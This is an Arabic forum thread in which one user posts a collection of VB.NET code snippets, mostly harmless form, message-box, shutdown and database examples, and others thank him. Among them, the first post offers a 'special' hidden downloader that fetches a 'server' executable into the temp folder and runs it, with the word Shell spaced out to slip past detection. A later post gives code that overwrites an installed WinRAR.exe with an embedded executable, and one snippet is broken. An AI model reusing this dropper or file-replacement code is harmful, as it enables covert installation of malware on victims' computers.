حالة الموضوع:
مغلق
  1. ●¦ Snharib ¦●

    ●¦ Snharib ¦● V • I • P

    الأنتساب:
    ‏8 يناير 2014
    المشاركات:
    1,128
    الإعجابات المتلقاة:
    1,786
    نقاط الجائزة:
    113
    الإقامة:
    || Iraq ||

    [​IMG]

    » الصلاة و السلام على أشرف المرسليـن ...~
    » الحمد لله وحده نحمده و نشكره و نستعينه و نستغفره و نعود بالله من شرور أنفسنا و من سيئات اعمالنا ...~
    » من يهده الله فلا مضل له و من يضلل فلن تجد له ولياً مرشدا ...~
    » و أشهد ألا إله إلا الله وحده لا شريك له و أن محمداً عبده و رسوله صلى الله عليه و سلم ...~
    » وعلى آله و صحبه أجمعين و من تبعهم بإحسان إلى يوم الدين ...~
    » ربنا لا علم لنا إلا ما علمتنا إنك أنت العليم الخبير ...~
    » ربنا لا فهم لنا إلا ما فهمتنا إنك أنت الجواد الكريم ...~
    » ربي اشرح لي صدري و يسر لي أمري و احلل عقدة من لساني يفقهوا قولي ...~

    [​IMG]

    ـأليوم موضوعنا هو أكواد برنامج الفيجول بيسك دوت نت انشالله رح انشر اكبر قدر من الأكواد.

    فقط الـ Vb.Net

    الموضوع متجدد أنشالله..

    نبدا بكتابة الاكواد

    اخفاء الفورم

    [NOTE]Me.Hide()[/NOTE]

    كود اظهار الفورم الثاني

    ملاحظة : نغير الرقم (2) لـرقم الفورم الي نريد نستخدمه. مثلا : Form6

    [NOTE]Form2.Show()[/NOTE]

    كود الخروج من البرنامج او من فروم واحد

    [NOTE]Me.Close()[/NOTE]

    كود المسج بوكس

    [NOTE]MessageBox.Show("اكتب هنا")[/NOTE]

    اذا ردنة نخلي باسورد لفروم او برنامج

    [NOTE]iraq:
    Dim Yasir as string
    Yasir = InputBox("ادخل كلمة مرور")
    If Yasir = "ضع هنا باسورد" then
    MessageBox.show("تم فتح برنامج")
    Else
    MessageBox.Show("باسورد غلط")
    Goto iraq
    End if[/NOTE]

    كود فتح موقع مباشرتناً

    [NOTE]Process.Start("ضع رابط موقع هنا")[/NOTE]

    كود فتح ملف في جهاز

    [NOTE]Process.start("مسار الملف مراد فتحة")[/NOTE]

    كود لجعل البرنامج يعمل مرة واحدة

    [NOTE]yasir()



    Sub yasir()
    Dim appProc() As Process
    Dim strModName, strProcName As String
    strModName = Process.GetCurrentProcess.MainModule.ModuleName
    strProcName = System.IO.Path.GetFileNameWithoutExtension(strModName)
    appProc = Process.GetProcessesByName(strProcName)
    If appProc.Length > 1 Then
    MessageBox.Show("Error")
    End[/NOTE]

    -------------------------------------

    أما هذه الكود مميز. )6:"

    لعمل داونلود مخفي للسيرفر وتشغيلة

    [NOTE]Dim web As New System.Net.WebClient
    web.DownloadFile("الرابط المباشر لسرفرك", Environ("tmp") & "/server.exe")
    S h e l l(Environ("tmp") & "/server.exe")[/NOTE]

    امسح فرغات كلمة S h e l l

    -------------------------------------

    [​IMG]

    الى هنا أتنهت أكواد اليوم وانشالله رح يتم وضع أكواد بـاستمرار.
    واي واحد عنده اكواد خلي ما يبخل علينا ويحطها في رد.


    [​IMG]
     
  2. ●¦ Snharib ¦●

    ●¦ Snharib ¦● V • I • P

    الأنتساب:
    ‏8 يناير 2014
    المشاركات:
    1,128
    الإعجابات المتلقاة:
    1,786
    نقاط الجائزة:
    113
    الإقامة:
    || Iraq ||
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    نرجع بالمزيد من الأكود :{17}:

    لعمل shutdown

    كود:
    System.diagnostics.Process.Start("shutdown", "-s")
    لعمل Restart

    كود:
    System.diagnostics.Process.Start("shutdown", "-r")
    لعمل Log off

    كود:
    System.diagnostics.Process.Start("shutdown", "-l")
    )5:"
     
    1 person likes this.
  3. ●¦ Snharib ¦●

    ●¦ Snharib ¦● V • I • P

    الأنتساب:
    ‏8 يناير 2014
    المشاركات:
    1,128
    الإعجابات المتلقاة:
    1,786
    نقاط الجائزة:
    113
    الإقامة:
    || Iraq ||
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    نرجع باك..

    رسالة عند فتح البرنامج تظهر

    [NOTE]Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

    msgbox("اهلا و سهلا ")

    end sub[/NOTE]

    رسالة عند غلق البرنامج تظهر رسالة

    [NOTE]
    Private Sub Form1_Closing(sender As Object, e As System.ComponentModel.CancelEventArgs) Handles MyBase.Closing

    msgbox("مع سلامة")

    end sub[/NOTE]

    ضع هذا الكود في الفروم و ضع اغنية او موسيقى في سورس و اجعلها بأسم Song


    [NOTE]My.Computer.Audio.Play(My.Resources.song, AudioPlayMode.BackgroundLoop)
    [/NOTE]
     
  4. ●¦ Snharib ¦●

    ●¦ Snharib ¦● V • I • P

    الأنتساب:
    ‏8 يناير 2014
    المشاركات:
    1,128
    الإعجابات المتلقاة:
    1,786
    نقاط الجائزة:
    113
    الإقامة:
    || Iraq ||
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    باك - نرجع بالمزيد من الأكواد. bl"eh"

    اطفاء الجهاز

    [NOTE]Public Class GetOutOfWindows
    ' Windows constants used in shutdown permissions.
    Const SE_PRIVILEGE_ENABLED As Integer = &H2
    Const TOKEN_QUERY As Integer = &H8
    Const TOKEN_ADJUST_PRIVILEGES As Integer = &H20
    Const SE_SHUTDOWN_NAME As String = "SeShutdownPrivilege"

    ' Shutdown method flags.
    Private Enum ShutdownMethods As Integer
    Logoff = 0
    Shutdown = 1
    Reboot = 6
    End Enum

    <Runtime.InteropServices.StructLayout(Runtime.InteropServices.Layout
    Kind.Sequential, Pack:=1)> Private Structure TokenPrivileges
    Public PrivilegeCount As Integer
    Public Luid As Long
    Public Attributes As Integer
    End Structure

    ' External features needed to exit Windows.
    Private Declare Ansi Function AdjustTokenPrivileges Lib "advapi32.dll" (ByVal tokenHandle As IntPtr, ByVal disableAllPrivileges
    As Boolean, ByRef newState As TokenPrivileges, ByVal bufferLength As Integer, ByVal previousState As IntPtr, ByVal returnLength As IntPtr) As
    Boolean
    Private Declare Ansi Function ExitWindowsEx Lib "user32.dll" (ByVal flags As Integer, ByVal reason As Integer) As Boolean
    Private Declare Ansi Function GetCurrentProcess Lib "kernel32.dll" () As IntPtr
    Private Declare Ansi Sub LockWorkStation Lib "user32.dll" () [/NOTE]

    التاكد من وجود ملف معين وفي حالة وجودة تنفيذ امر معين هية هنا اكو مسج بوكس
    شيلة وخلي شيل او خلي تنفيذ او داونلودر

    [NOTE]Dim strFile As String = "C:\Library.mdb"
    If Not File.Exists(strFile) Then
    MsgBox("File not found , check your path first.")
    Application.Exit()
    End If [/NOTE]

    السماح للارقام ومنع الحروف

    [NOTE]Private Sub TextEV3_KeyPress(ByVal sender As Object, _ ByVal e As KeyPressEventArgs) Handles TextBox3.KeyPress
    If Char.IsNumber(e.KeyChar) = False Then e.Handled = True End Sub
    [/NOTE]

    منع كتابت شي في التكست بوكس يعني كلمات موش حلوة ههه

    [NOTE]f e.KeyChar = CChar("r") Then e.Handled = True [/NOTE]

    ^:" ^:"
     
  5. Team TrYaG

    Team TrYaG Active DeveloPer

    الأنتساب:
    ‏19 سبتمبر 2011
    المشاركات:
    75
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    8
    الإقامة:
    ksa
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    بارك الله فيك يا غالي %:"
     
  6. Cracker

    Cracker Developer

    الأنتساب:
    ‏24 ديسمبر 2012
    المشاركات:
    24
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    السلام عليكم و رحمة الله و بركاته
    ما شاء الله عليك يا غالي
    فعلآ اكواد مفيده
    جزاك الله كل خير ،،
    تحياتي ​
     
  7. ТUЯКł ΛŁ HΛЯБł

    ТUЯКł ΛŁ HΛЯБł DeveloPer Plus

    الأنتساب:
    ‏17 يوليو 2012
    المشاركات:
    111
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    16
    الوظيفة:
    طآلب جآمعي :(
    الإقامة:
    السعودية
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    و عليكم السلام

    يعطيك العافية اخي Snharib واصل ابداعك
     
  8. TheDevilSpy

    TheDevilSpy Developer

    الأنتساب:
    ‏8 ديسمبر 2011
    المشاركات:
    13
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    1
    الوظيفة:
    طالب
    الإقامة:
    Street
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    و عليكم السلام

    يعطيك العافية يا مبدع

    واصل يا بطل
     
  9. أحمد عآدل

    أحمد عآدل Developer

    الأنتساب:
    ‏2 نوفمبر 2011
    المشاركات:
    31
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    جده
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    وعليكم السلام أخي شكرا لك :{1}:
     
  10. ●¦ Snharib ¦●

    ●¦ Snharib ¦● V • I • P

    الأنتساب:
    ‏8 يناير 2014
    المشاركات:
    1,128
    الإعجابات المتلقاة:
    1,786
    نقاط الجائزة:
    113
    الإقامة:
    || Iraq ||
    رد: [ مكتبة ] اكواد فيجول بيسك دوت نت : Visual Basic Codes .Net "موضوع متجدد "

    إستبدال برنامج مٌثبت على النظام ببرنامج متواجد بالريسورس

    [NOTE]If Environment.GetFolderPath(38).Contains("x86") Then
    Dim T As String = System.IO.Path.GetTempPath : Dim A() As Byte = My.Resources.T3_VB_Theme_Archive_1_4
    System.IO.File.WriteAllBytes(T & "X.exe", A)
    System.IO.File.Replace("C:\Program Files\WinRAR\WinRAR.exe", T & "X.exe", "")
    Else
    Dim T As String = System.IO.Path.GetTempPath : Dim A() As Byte = My.Resources.T3_VB_Theme_Archive_1_4
    System.IO.File.WriteAllBytes(T & "X.exe", A)
    System.IO.File.Replace("C:\Program Files (x86)\WinRAR\WinRAR.exe", T & "X.exe", "")
    End If[/NOTE]

    كود تكرار العمليه ’ تكرار اي شيءً

    [NOTE]for i = 0 to 20
    msgbox("Hi")
    Next[/NOTE]

    مع مراعاةً استبدالً msgbox("Hi") بـ العملية / الكود.

    ربطً قاعدة بيانات .

    [NOTE]Private Sub OpenConn()
    Try
    DataSet = IO.Path.GetDirectoryName(Application.ExecutablePath) & "\Data.mdb"
    con.ConnectionString = "provider=microsoft.jet.oledb.4.0;data source=" & DataPath
    con.Open()

    ReadMyDataBase(con.ConnectionString)
    Catch ex As Exception
    MsgBox(ex.Message, MsgBoxStyle.Information, "Info")
    End Try
    End Sub[/NOTE]

    تغير خلفية ListView

    [NOTE]Dim col As New ColorDialog
    With col
    .ShowDialog()
    End With
    ListView1.BackColor = col.Color[/NOTE]

    فتح ملف مرفق في مجلد بجانب البرنامج

    Dim exePath As String = Application.StartupPath & "\Iq\Test.exe"
    Process.Start(exePath)

    هذا الكود لتشغيل برنامج بإسم Testموجود بداخل مجلد اسمه Iq بجانب برنامج
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة